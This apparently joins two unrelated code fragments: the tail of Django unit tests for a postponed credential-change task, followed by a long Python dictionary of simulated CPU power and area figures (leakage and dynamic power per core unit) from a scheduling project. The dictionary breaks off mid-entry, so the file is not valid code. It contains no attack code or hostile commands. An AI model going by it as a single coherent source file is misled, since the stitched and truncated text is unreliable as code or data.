postponed_taks.id))) self.assertEqual(self.client.session.get('_auth_user_id'), None) def test_process__wrong_state(self): self.postponed_task.state = postponed_tasks.CHANGE_CREDENTIALS_STATE.PROCESSED self.assertEqual(self.postponed_task.process(main_task=mock.Mock()), POSTPONED_TASK_LOGIC_RESULT.ERROR) self.assertTrue(self.postponed_task.state.is_WRONG_STATE) def test_process(self): self.assertEqual(self.postponed_task.process(main_task=mock.Mock()), POSTPONED_TASK_LOGIC_RESULT.SUCCESS) self.assertTrue(self.postponed_task.state.is_PROCESSED) self.assertEqual(django_auth.authenticate(nick='test_nick', password='<PASSWORD>').email, '<EMAIL>')
<reponame>TugberkArkose/MLScheduler power = {'BUSES': {'Area': 1.33155, 'Bus/Area': 1.33155, 'Bus/Gate Leakage': 0.00662954, 'Bus/Peak Dynamic': 0.0, 'Bus/Runtime Dynamic': 0.0, 'Bus/Subthreshold Leakage': 0.0691322, 'Bus/Subthreshold Leakage with power gating': 0.0259246, 'Gate Leakage': 0.00662954, 'Peak Dynamic': 0.0, 'Runtime Dynamic': 0.0, 'Subthreshold Leakage': 0.0691322, 'Subthreshold Leakage with power gating': 0.0259246}, 'Core': [{'Area': 32.6082, 'Execution Unit/Area': 8.2042, 'Execution Unit/Complex ALUs/Area': 0.235435, 'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646, 'Execution Unit/Complex ALUs/Peak Dynamic': 0.261644, 'Execution Unit/Complex ALUs/Runtime Dynamic': 0.408195, 'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111, 'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163, 'Execution Unit/Floating Point Units/Area': 4.6585, 'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156, 'Execution Unit/Floating Point Units/Peak Dynamic': 1.09451, 'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033, 'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829, 'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061, 'Execution Unit/Gate Leakage': 0.122718, 'Execution Unit/Instruction Scheduler/Area': 2.17927, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.754389, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066, 'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101, 'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996, 'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112, 'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911, 'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 1.30633, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351, 'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781, 'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232, 'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399, 'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892, 'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.749216, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339, 'Execution Unit/Instruction Scheduler/Runtime Dynamic': 2.80993, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291, 'Execution Unit/Integer ALUs/Area': 0.47087, 'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291, 'Execution Unit/Integer ALUs/Peak Dynamic': 0.577878, 'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344, 'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222, 'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833, 'Execution Unit/Peak Dynamic': 8.1935, 'Execution Unit/Register Files/Area': 0.570804, 'Execution Unit/Register Files/Floating Point RF/Area': 0.208131, 'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788, 'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.206776, 'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0273472, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968, 'Execution Unit/Register Files/Gate Leakage': 0.000622708, 'Execution Unit/Register Files/Integer RF/Area': 0.362673, 'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992, 'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.308658, 'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.202249, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675, 'Execution Unit/Register Files/Peak Dynamic': 0.515433, 'Execution Unit/Register Files/Runtime Dynamic': 0.229596, 'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387, 'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643, 'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632, 'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074, 'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.817524, 'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 1.82946, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155, 'Execution Unit/Runtime Dynamic': 5.68256, 'Execution Unit/Subthreshold Leakage': 1.83518, 'Execution Unit/Subthreshold Leakage with power gating': 0.709678, 'Gate Leakage': 0.372997, 'Instruction Fetch Unit/Area': 5.86007, 'Instruction Fetch Unit/Branch Predictor/Area': 0.138516, 'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00219219, 'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00219219, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00191502, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000744414, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045, 'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838, 'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732, 'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05, 'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602, 'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00290533, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733, 'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00920474, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282, 'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954, 'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758, 'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867, 'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0208175, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357, 'Instruction Fetch Unit/Gate Leakage': 0.0590479, 'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323, 'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05, 'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827, 'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.194427, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682, 'Instruction Fetch Unit/Instruction Cache/Area': 3.14635, 'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931, 'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323, 'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.479605, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386, 'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799, 'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493, 'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404, 'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.660362, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104, 'Instruction Fetch Unit/Peak Dynamic': 8.96874, 'Instruction Fetch Unit/Runtime Dynamic': 1.36442, 'Instruction Fetch Unit/Subthreshold Leakage': 0.932587, 'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542, 'L2/Area': 4.53318, 'L2/Gate Leakage': 0.015464, 'L2/Peak Dynamic': 0.0235533, 'L2/Runtime Dynamic': 0.00587734, 'L2/Subthreshold Leakage': 0.834142, 'L2/Subthreshold Leakage with power gating': 0.401066, 'Load Store Unit/Area': 8.80969, 'Load Store Unit/Data Cache/Area': 6.84535, 'Load Store Unit/Data Cache/Gate Leakage': 0.0279261, 'Load Store Unit/Data Cache/Peak Dynamic': 6.90651, 'Load Store Unit/Data Cache/Runtime Dynamic': 2.73215, 'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675, 'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085, 'Load Store Unit/Gate Leakage': 0.0351387, 'Load Store Unit/LoadQ/Area': 0.0836782, 'Load Store Unit/LoadQ/Gate Leakage': 0.00059896, 'Load Store Unit/LoadQ/Peak Dynamic': 0.183418, 'Load Store Unit/LoadQ/Runtime Dynamic': 0.183418, 'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961, 'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918, 'Load Store Unit/Peak Dynamic': 7.77618, 'Load Store Unit/Runtime Dynamic': 3.82013, 'Load Store Unit/StoreQ/Area': 0.322079, 'Load Store Unit/StoreQ/Gate Leakage': 0.00329971, 'Load Store Unit/StoreQ/Peak Dynamic': 0.452278, 'Load Store Unit/StoreQ/Runtime Dynamic': 0.904556, 'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621, 'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004, 'Load Store Unit/Subthreshold Leakage': 0.591622, 'Load Store Unit/Subthreshold Leakage with power gating': 0.283406, 'Memory Management Unit/Area': 0.434579, 'Memory Management Unit/Dtlb/Area': 0.0879726, 'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729, 'Memory Management Unit/Dtlb/Peak Dynamic': 0.160515, 'Memory Management Unit/Dtlb/Runtime Dynamic': 0.160782, 'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699, 'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485, 'Memory Management Unit/Gate Leakage': 0.00813591, 'Memory Management Unit/Itlb/Area': 0.301552, 'Memory Management Unit/Itlb/Gate Leakage': 0.00393464, 'Memory Management Unit/Itlb/Peak Dynamic': 0.399995, 'Memory Management Unit/Itlb/Runtime Dynamic': 0.078881, 'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758, 'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842, 'Memory Management Unit/Peak Dynamic': 0.835993, 'Memory Management Unit/Runtime Dynamic': 0.239663, 'Memory Management Unit/Subthreshold Leakage': 0.0769113, 'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462, 'Peak Dynamic': 30.3597, 'Renaming Unit/Area': 0.369768, 'Renaming Unit/FP Front End RAT/Area': 0.168486, 'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731, 'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511, 'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.721394, 'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281, 'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925, 'Renaming Unit/Free List/Area': 0.0414755, 'Renaming Unit/Free List/Gate Leakage': 4.15911e-05, 'Renaming Unit/Free List/Peak Dynamic': 0.0401324, 'Renaming Unit/Free List/Runtime Dynamic': 0.047256, 'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426, 'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987, 'Renaming Unit/Gate Leakage': 0.00863632, 'Renaming Unit/Int Front End RAT/Area': 0.114751, 'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343, 'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945, 'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.384653, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781, 'Renaming Unit/Peak Dynamic': 4.56169, 'Renaming Unit/Runtime Dynamic': 1.1533, 'Renaming Unit/Subthreshold Leakage': 0.070483, 'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779, 'Runtime Dynamic': 12.2659, 'Subthreshold Leakage': 6.21877, 'Subthreshold Leakage with power gating': 2.58311}, {'Area': 32.0201, 'Execution Unit/Area': 7.68434, 'Execution Unit/Complex ALUs/Area': 0.235435, 'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646, 'Execution Unit/Complex ALUs/Peak Dynamic': 0.10824, 'Execution Unit/Complex ALUs/Runtime Dynamic': 0.287705, 'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111, 'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163, 'Execution Unit/Floating Point Units/Area': 4.6585, 'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156, 'Execution Unit/Floating Point Units/Peak Dynamic': 0.46093, 'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033, 'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829, 'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061, 'Execution Unit/Gate Leakage': 0.120359, 'Execution Unit/Instruction Scheduler/Area': 1.66526, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.269111, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519, 'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913, 'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223, 'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562, 'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763, 'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.434066, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964, 'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262, 'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388, 'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608, 'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451, 'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.219102, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446, 'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.922278, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346, 'Execution Unit/Integer ALUs/Area': 0.47087, 'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291, 'Execution Unit/Integer ALUs/Peak Dynamic': 0.237117, 'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344, 'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222, 'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833, 'Execution Unit/Peak Dynamic': 5.16995, 'Execution Unit/Register Files/Area': 0.570804, 'Execution Unit/Register Files/Floating Point RF/Area': 0.208131, 'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788, 'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0870795, 'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0112877, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968, 'Execution Unit/Register Files/Gate Leakage': 0.000622708, 'Execution Unit/Register Files/Integer RF/Area': 0.362673, 'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992, 'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.127173, 'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0834796, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675, 'Execution Unit/Register Files/Peak Dynamic': 0.214252, 'Execution Unit/Register Files/Runtime Dynamic': 0.0947673, 'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387, 'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643, 'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912, 'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402, 'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.294983, 'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.660797, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543, 'Execution Unit/Runtime Dynamic': 2.37092, 'Execution Unit/Subthreshold Leakage': 1.79543, 'Execution Unit/Subthreshold Leakage with power gating': 0.688821, 'Gate Leakage': 0.368936, 'Instruction Fetch Unit/Area': 5.85939, 'Instruction Fetch Unit/Branch Predictor/Area': 0.138516, 'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00104267, 'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00104267, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000944444, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00038545, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045, 'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838, 'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732, 'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05, 'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602, 'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00119919, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733, 'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00422898, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282, 'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954, 'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758, 'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867, 'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00870096, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357, 'Instruction Fetch Unit/Gate Leakage': 0.0589979, 'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323, 'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05, 'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827, 'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.080251, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682, 'Instruction Fetch Unit/Instruction Cache/Area': 3.14635, 'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931, 'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.10465, 'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.196881, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386, 'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799, 'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493, 'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404, 'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.272569, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104, 'Instruction Fetch Unit/Peak Dynamic': 7.57091, 'Instruction Fetch Unit/Runtime Dynamic': 0.56263, 'Instruction Fetch Unit/Subthreshold Leakage': 0.932286, 'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843, 'L2/Area': 4.53318, 'L2/Gate Leakage': 0.015464, 'L2/Peak Dynamic': 0.0108555, 'L2/Runtime Dynamic': 0.00260558, 'L2/Subthreshold Leakage': 0.834142, 'L2/Subthreshold Leakage with power gating': 0.401066, 'Load Store Unit/Area': 8.80901, 'Load Store Unit/Data Cache/Area': 6.84535, 'Load Store Unit/Data Cache/Gate Leakage': 0.0279261, 'Load Store Unit/Data Cache/Peak Dynamic': 3.59672, 'Load Store Unit/Data Cache/Runtime Dynamic': 1.13709, 'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675, 'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085, 'Load Store Unit/Gate Leakage': 0.0350888, 'Load Store Unit/LoadQ/Area': 0.0836782, 'Load Store Unit/LoadQ/Gate Leakage': 0.00059896, 'Load Store Unit/LoadQ/Peak Dynamic': 0.0763388, 'Load Store Unit/LoadQ/Runtime Dynamic': 0.0763389, 'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961, 'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918, 'Load Store Unit/Peak Dynamic': 3.95721, 'Load Store Unit/Runtime Dynamic': 1.58991, 'Load Store Unit/StoreQ/Area': 0.322079, 'Load Store Unit/StoreQ/Gate Leakage': 0.00329971, 'Load Store Unit/StoreQ/Peak Dynamic': 0.188239, 'Load Store Unit/StoreQ/Runtime Dynamic': 0.376478, 'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621, 'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004, 'Load Store Unit/Subthreshold Leakage': 0.591321, 'Load Store Unit/Subthreshold Leakage with power gating': 0.283293, 'Memory Management Unit/Area': 0.4339, 'Memory Management Unit/Dtlb/Area': 0.0879726, 'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729, 'Memory Management Unit/Dtlb/Peak Dynamic': 0.0668065, 'Memory Management Unit/Dtlb/Runtime Dynamic': 0.066927, 'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699, 'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485, 'Memory Management Unit/Gate Leakage': 0.00808595, 'Memory Management Unit/Itlb/Area': 0.301552, 'Memory Management Unit/Itlb/Gate Leakage': 0.00393464, 'Memory Management Unit/Itlb/Peak Dynamic': 0.317389, 'Memory Management Unit/Itlb/Runtime Dynamic': 0.0324018, 'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758, 'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842, 'Memory Management Unit/Peak Dynamic': 0.588259, 'Memory Management Unit/Runtime Dynamic': 0.0993287, 'Memory Management Unit/Subthreshold Leakage': 0.0766103, 'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333, 'Peak Dynamic': 20.8867, 'Renaming Unit/Area': 0.303608, 'Renaming Unit/FP Front End RAT/Area': 0.131045, 'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123, 'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468, 'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.229066, 'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571, 'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885, 